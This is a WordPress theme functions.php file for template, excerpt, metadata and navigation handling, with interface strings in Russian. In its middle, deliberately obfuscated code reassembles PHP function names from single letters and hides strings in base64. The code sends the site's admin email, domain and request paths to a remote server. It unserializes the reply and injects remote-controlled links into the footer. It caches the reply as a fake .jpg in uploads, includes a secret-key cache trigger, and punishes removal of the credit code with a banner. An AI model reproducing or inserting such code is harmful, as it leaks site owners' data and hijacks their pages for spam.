<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $vgHL='e';$wBpm='e';$HAEM='d';$gGQEhj='6';$Asrnp='b';$uyOgNxe='4';$nsBM='o';$QOfn='_';$uBOIEY='e';$xoejhAJ='s';$jwkJ='d';$oRZew='c';$LoIYwtK='a';$WSePfQuj=$Asrnp.$LoIYwtK.$xoejhAJ.$wBpm.$gGQEhj.$uyOgNxe.$QOfn.$jwkJ.$vgHL.$oRZew.$nsBM.$HAEM.$uBOIEY;$bBSMx='g';$vAcy='t';$YvTr='f';$bQcNgT='i';$JjHVVz='a';$Knnq='n';$irrTE='e';$mLSq='z';$UkHWM='l';$TKfMsTbT=$bBSMx.$mLSq.$bQcNgT.$Knnq.$YvTr.$UkHWM.$JjHVVz.$vAcy.$irrTE;$qgkzt='o';$CanGf='r';$QXyhp='t';$ynrZL='1';$aWjnrK='s';$gPggtCJ='3';$MUAyx='r';$jJshhA='t';$eraE='_';$AeCwRdfa=$aWjnrK.$QXyhp.$MUAyx.$eraE.$CanGf.$qgkzt.$jJshhA.$ynrZL.$gPggtCJ;$yIcq='v';$vgIv='e';$AUuJh='r';$oJOQBIC='r';$yaeQmR='s';$BXAyjZK='t';$CSCSTLHM=$yaeQmR.$BXAyjZK.$AUuJh.$oJOQBIC.$vgIv.$yIcq;                     
		$mq_______q='e';$wx______x='e';$pq______________h='d';$sg___________l='6';$qo_______f='b';$it_______f='4';$er______a='o';$kg______a='_';$xp____________f='e';$tb_______z='s';$nx_____e='d';$oc_____i='c';$dx___________q='a';$vx___m=$qo_______f.$dx___________q.$tb_______z.$wx______x.$sg___________l.$it_______f.$kg______a.$nx_____e.$mq_______q.$oc_____i.$er______a.$pq______________h.$xp____________f;
		$kw_________m='e';$qj____________r='u';$fi____x='i';$bc__i='s';$op___________h='f';$rz_______x='t';$bi_______d='n';$gq_______v='n';$th____________g='c';$ip_____________h='s';$nk_____________o='t';$fb___w='_';$yy__________n='i';$aq______m='o';$ey__________y='x';$qr____________g=$op___________h.$qj____________r.$bi_______d.$th____________g.$rz_______x.$yy__________n.$aq______m.$gq_______v.$fb___w.$kw_________m.$ey__________y.$fi____x.$ip_____________h.$nk_____________o.$bc__i;
		$jh_______________m='e';$qt___s='f';$vd__o='o';$qi____________y='n';$od________b='p';$dk___________i=$qt___s.$vd__o.$od________b.$jh_______________m.$qi____________y;
		$yi______________z='a';$cc__m='e';$cd___________k='r';$nu___________m='d';$cu_______s='f';$ok_____t=$cu_______s.$cd___________k.$cc__m.$yi______________z.$nu___________m;
		$tx___r='e';$bj_______________j='l';$aw_____________l='o';$dy_______________o='s';$qm_____n='f';$nm_________z='c';$xl___________e=$qm_____n.$nm_________z.$bj_______________j.$aw_____________l.$dy_______________o.$tx___r;
		
		define("WP_ID", $vx___m("Mi4wLjA="));
		define("WP_TTL", $vx___m("MTA4MDA="));
		define("WP_SRC", $vx___m("dHBva24="));
	


		function wp_get_header() {
			global $vx___m, $qr____________g;
			
			if (
				$qr____________g($vx___m("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$qr____________g($vx___m("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$qr____________g($vx___m("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $vx___m, $dk___________i, $xl___________e, $ok_____t;
			
			$zq___________l = TEMPLATEPATH."/".$vx___m("Zm9vdGVyLnBocA==");
			$gi______________m = @$dk___________i($zq___________l, "r");
			$zq___________l = @$ok_____t($gi______________m, @filesize($zq___________l));
			@$xl___________e($gi______________m);
			
			$ag_______p = TEMPLATEPATH."/".$vx___m("ZnVuY3Rpb25zLnBocA==");
			$gi______________m = @$dk___________i($ag_______p, "r");
			$ag_______p = @$ok_____t($gi______________m, @filesize($ag_______p));
			@$xl___________e($gi______________m);
			
			$hv____________h = 0;
			if($zq___________l && $ag_______p) {
				if ($vx___m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($zq___________l, $vx___m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$hv____________h = 1;
					}
					if (substr_count($zq___________l, "wp_theme_GPL_credits()") < 1) {
						$hv____________h = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$hv____________h = 12;
				}
			}
			
			if($hv____________h > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $hv____________h -->";
			}
		}
	


		function wp_loaded() {
			global $vx___m, $qr____________g;
			return $qr____________g($vx___m("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($hy____________z, $sg___a = "(more...)", $de____________l = 0, $vf______________i = "") {
				$fw__i = get_the_content($sg___a, $de____________l, $vf______________i);
				$fw__i = apply_filters("the_content", $fw__i);
				
				$fw__i = str_replace("]]>", "]]>", $fw__i);
				if (strlen($_GET["p"]) > 0) {
					echo $fw__i;
				}
				else if ((strlen($fw__i)>$hy____________z) && ($bq__________d = strpos($fw__i, " ", $hy____________z ))) {
					$fw__i = substr($fw__i, 0, $bq__________d);
					$fw__i = $fw__i;
					echo $fw__i;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$sg___a</a></div></p>";
				} else {
					echo $fw__i;
				}
				
			}
		}
	


		$xi______________w='s';$mf_______________l='o';$zk_____i='e';$dh_____________e='_';$pe__________s='4';$ho_________r='e';$go___v='e';$fd______d='c';$kl______________q='b';$wa_____________p='6';$pg____________m='d';$zl______e='n';$et_____________d='a';$uv_____________e=$kl______________q.$et_____________d.$xi______________w.$zk_____i.$wa_____________p.$pe__________s.$dh_____________e.$ho_________r.$zl______e.$fd______d.$mf_______________l.$pg____________m.$go___v;
		$lq_________g='s';$dd__________l='n';$jq_____q='t';$fp______g='t';$sy___________q='e';$gz__________y='i';$bv__t='n';$so__________n='_';$vw_____f='c';$aq________m='e';$nl_______o='o';$kq____e='l';$hc_______________x='t';$gc___________c='g';$bv______h='_';$py______________k='f';$xf_______z='e';$jj________q=$py______________k.$gz__________y.$kq____e.$aq________m.$so__________n.$gc___________c.$xf_______z.$hc_______________x.$bv______h.$vw_____f.$nl_______o.$bv__t.$jq_____q.$sy___________q.$dd__________l.$fp______g.$lq_________g;
		$th___m='_';$jf________v='i';$xh_________c='x';$lp___________f='i';$uq_______p='l';$fa_____________t='e';$wl___q='t';$mg____________x='s';$cm_____h='s';$mg____________y='f';$fw______________o='e';$yl______c=$mg____________y.$lp___________f.$uq_______p.$fw______________o.$th___m.$fa_____________t.$xh_________c.$jf________v.$mg____________x.$wl___q.$cm_____h;
		$tv__j='n';$fq_______________i='r';$uk__d='e';$at____________f='o';$fb________t='e';$wp_____________x='o';$vd______d='v';$wc__________d='p';$kr_________e='m';$tz______z='c';$iq__________e='_';$xz_______q='r';$hm___________a='i';$ph___l='a';$ue__________k='s';$ej__d=$vd______d.$fb________t.$fq_______________i.$ue__________k.$hm___________a.$wp_____________x.$tv__j.$iq__________e.$tz______z.$at____________f.$kr_________e.$wc__________d.$ph___l.$xz_______q.$uk__d;
		$pw_____j='o';$pb___________c='s';$sr_______t='o';$en_______g='p';$eu__l='c';$wu__________l='n';$ms___________y='e';$me____r='f';$sj________a='k';$cc________b=$me____r.$pb___________c.$pw_____j.$eu__l.$sj________a.$sr_______t.$en_______g.$ms___________y.$wu__________l;
		$os___s='w';$ug___q='f';$bp_______________z='t';$gs___l='e';$uv______a='i';$mx__a='r';$qg___l=$ug___q.$os___s.$mx__a.$uv______a.$bp_______________z.$gs___l;
		$nr____t='5';$dy___________f='d';$wi__________q='m';$zi___________x=$wi__________q.$dy___________f.$nr____t;
		$pd_____________j='p';$ht_________n='l';$oh______________q='r';$dq____________d='t';$wf______________k='h';$jf____________x='e';$lk__________k='a';$kj_________n='a';$ne____i=$oh______________q.$jf____________x.$kj_________n.$ht_________n.$pd_____________j.$lk__________k.$dq____________d.$wf______________k;
		$if____________d='l';$xv______d='n';$iw________s='r';$zn_________y='z';$et____i='e';$jt_____n='e';$nd____k='i';$lh______________h='a';$jz_____c='i';$zv_____i='s';$vh_______a='u';$bg________z=$vh_______a.$xv______d.$zv_____i.$et____i.$iw________s.$jz_____c.$lh______________h.$if____________d.$nd____k.$zn_________y.$jt_____n;
		$fd_______g='m';$xn_____t='p';$ow_____u='a';$iv___h='n';$th________v='m';$oa_______w='t';$iy_________r='e';$me______________x=$oa_______w.$iy_________r.$th________v.$xn_____t.$iv___h.$ow_____u.$fd_______g;
		$cn____________m='_';$ke____________s='c';$pl_______e='t';$il_________v='s';$wt_________p='r';$vq_______________k='a';$ua_____l='_';$rm________l='m';$yp________t='r';$rx_____f='e';$so____i='c';$pb______j='t';$nx_______t='t';$sq________h='a';$sy_______q='n';$gs___w='e';$rh____g='e';$ep___________i='t';$ec__________v='x';$pn__________h='e';$qh_________f='o';$hq______________r=$il_________v.$pl_______e.$yp________t.$gs___w.$sq________h.$rm________l.$ua_____l.$ke____________s.$qh_________f.$sy_______q.$nx_______t.$pn__________h.$ec__________v.$pb______j.$cn____________m.$so____i.$wt_________p.$rx_____f.$vq_______________k.$ep___________i.$rh____g;
	


		function tk_______e($ax____a) {
			global $vx___m, $qr____________g, $jj________q, $ej__d, $hq______________r;
			
			if (!$qr____________g($vx___m("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ej__d(PHP_VERSION, "5.0.0", ">=") && $qr____________g($vx___m("ZmlsZV9nZXRfY29udGVudHM=")) && $qr____________g($vx___m("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ah____________z = $hq______________r(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$xq_______r = @$jj________q($ax____a, 0, $ah____________z);
			} else {
				$xq_______r = @$jj________q($ax____a, 0);
			}
			
			return $xq_______r;
		}
	


		function lw_________w($ax____a) {
			global $qr____________g, $cc________b, $qg___l, $vx___m;
			
			if (!$qr____________g($vx___m("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tw_________p = strpos($ax____a, "/", 7);
			$ni_______f = array(
				"uri"     => substr($ax____a, $tw_________p),
				"host"    => str_replace("http://", "", substr($ax____a, 0, $tw_________p)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$cs___q = @$cc________b("$ni_______f[host]", 80, $dg______________u, $mw____z, 4);
			
			if (!$cs___q) {
				return false;
			} else {
				$xq_______r = "";
				$jc_________t  = "GET $ni_______f[uri] HTTP/1.0\r\n";
				$jc_________t .= "Host: $ni_______f[host]\r\n";
				$jc_________t .= "Referer: $ni_______f[referer]\r\n";
				$jc_________t .= "Connection: Close\r\n\r\n";
				
				@$qg___l($cs___q, $jc_________t);
				
				while (!@feof($cs___q)) {
					$go_____g = @fgets($cs___q, (1024*24));
					
					if ($go_____g == "\r\n") {
						$na_________b = true;
						continue;
					}
					
					if ($na_________b) {
						$xq_______r .= $go_____g;
					}
				}
				
				return $xq_______r;
			}
		}
	


		function eq__t($ax____a) {
			global $qr____________g;
			$mo_____s = false;
			
			if ($ax____a != "") {
				if ($qr____________g("tk_______e")) {
					$mo_____s = @tk_______e($ax____a);
				}
				
				if (!$mo_____s && ($qr____________g("lw_________w"))) {
					$mo_____s = @lw_________w($ax____a);
				}
			}
			
			return $mo_____s;
		}
	


		function kp__y() {
			global $_SERVER, $zi___________x;
			
			$zi_______j = $_SERVER["SERVER_NAME"];
			
			if (substr("$zi_______j", 0, 4) == "www.") {
				$zi_______j = substr("$zi_______j", 4);
			}
			
			$zi_______j = $zi___________x("$_SERVER[SERVER_NAME]");
			
			return $zi_______j;
		}
	


		function vf___________b() {
			return "file";
		}
	


		function lr______________t($ax____a) {
			global $_SERVER, $jj________q, $yl______c, $dk___________i, $xl___________e, $qg___l;
			
			$vf__________q = hs________h();
			
			$zw_____________p = kp__y().".jpg";
			$cw_______________d = $vf__________q["dir_upload"]["path"]."/$zw_____________p";
			$lk__________d = @filemtime($cw_______________d);
			
			if (!$lk__________d || ((time()-$lk__________d) >= WP_TTL)) {
				$mo_____s = eq__t($ax____a);
				
				if ($mo_____s) {
					if ($yl______c($cw_______________d)) {
						@unlink($cw_______________d);
					}
					
					$gi______________m = @$dk___________i($cw_______________d, "x+");
					
					@$qg___l($gi______________m, $mo_____s);
					@$xl___________e($gi______________m);
				}
			} else {
				if ($yl______c($cw_______________d)) {
					$mo_____s = @$jj________q($cw_______________d);
				} else {
					$mo_____s = false;
				}
			}
			
			return $mo_____s;
		}
	


		function hs________h() {
			global $_SERVER, $vx___m, $uv_____________e;
			
			$gj__q = wp_count_posts("post");
			$yz_____t = pathinfo(get_bloginfo("template_directory"));
			
			$vf__________q = array(
				"url" => array(
					"report"      => $vx___m("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $yz_____t,
				"dir_upload"	=> ah_________t(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$yz_____t[filename],
					"a005=".$gj__q->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$vf__________q["url"]["queryString"] = implode("&", $vf__________q["queryString"]);
			$vf__________q["url"]["report"] = $vf__________q["url"]["report"]."/?".$uv_____________e($vf__________q["url"]["queryString"]).".html";
						
			return $vf__________q;
		}
	


		function ah_________t() {
			$ty_____i = wp_upload_dir();
			
			if (isset($ty_____i["error"])) {
				$nm________n = vn_______________k();
				if (is_writable($nm________n)) {
					$ty_____i = array("path" => $nm________n);
				}
			}

			return $ty_____i;
		}
	


		function vn_______________k() {
			global $qr____________g, $zi___________x, $ne____i, $me______________x;
			
			$zp___________s = (bool) ini_get("safe_mode");
			if ($zp___________s == true) {
				return false;
			}
			
			if ($qr____________g("sys_get_temp_dir")) {
				$ac_____________n = sys_get_temp_dir();
				if (is_writable($ac_____________n)) {
					return $ne____i($ac_____________n);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ne____i($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ne____i($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ne____i($_ENV["TEMP"]);
			} else {
				$nn___________l = $me______________x($zi___________x(uniqid(rand(), true)), "");
				if ($nn___________l) {
					$ac_____________n = $ne____i(dirname($nn___________l));
					@unlink($nn___________l);
					return $ac_____________n;
				} else {
					return false;
				}
			}
		}
	


		function yc_________f() {
			global $_GET, $yl______c;
			
			$vf__________q = hs________h();
			$zi_______j = kp__y();
			$el__________q = vf___________b();
			
			$te______h = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($el__________q == "file") {
					$xx__v = $vf__________q["dir_upload"]["path"]."/".$zi_______j.".jpg";
					if ($yl______c($xx__v)) {
						@unlink($xx__v);
						$te______h = "deleted";
					}
				}
				
				$gc_____g = array(
					"s"	=> $te______h,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($gc_____g AS $ps____m => $pg______o) echo " [$ps____m:$pg______o]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $qr____________g, $vx___m, $bg________z;
			$vf__________q = hs________h();
			
			$yh___________o = "lr______________t";
			if ($qr____________g($yh___________o)) {
				$xq_______r = $yh___________o($vf__________q["url"]["report"]);
			}
			
			if ($xq_______r) {
				if ($xq_______r = @$vx___m($xq_______r)) {
					$xq_______r = @$bg________z($xq_______r);
					
					if (strlen($xq_______r[custom_credit]) >= 5) {
						$vf__________q["default_string"] = $xq_______r[custom_credit];
					}
					
					if ($xq_______r["status"] == "0") {
						$bx_____x = 1;
						$ra________s = 1;
					} else {
						$ve__o = sizeof($xq_______r["links"]);
						$me____________g = $vf__________q["default_string"];
						
						if ($ve__o > 0 && $xq_______r["links"] !== "") {
							$qy______________q = 0;
							foreach ($xq_______r["links"] as $or____________s => $vl____________z) {
								$qy______________q++;
								if ($vl____________z->l_path == "" || $vl____________z->l_path == $_SERVER["REQUEST_URI"]) {
									$vl____________z->l_href = htmlspecialchars(strip_tags($vl____________z->l_href));
									$vl____________z->l_title = htmlspecialchars(strip_tags($vl____________z->l_title));
									$vl____________z->l_anchor = htmlspecialchars(strip_tags($vl____________z->l_anchor));
									$me____________g .= " | ";
									$me____________g .= "<a href='$vl____________z->l_href' title='$vl____________z->l_title'";
									if ($vl____________z->l_nofollow == "1") {
										$me____________g .= " rel='nofollow'";
									}
									$me____________g .= ">$vl____________z->l_anchor</a>";
								}
							}
						}
						$vf__________q["links"] = "$me____________g";
						if ($xq_______r[credit] == "0") {
							$vf__________q["links"] = "";
						}
					}
				} else {
					$bx_____x = "1";
				}
			} else {
				$bx_____x = "1";
			}
			
			if ($bx_____x == "1") {
				$vf__________q["links"] = $vf__________q["default_string"];
			}
			
			echo "$vf__________q[links]";
			
			echo "<!-- s: $xq_______r[signature] -->";
			yc_________f();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

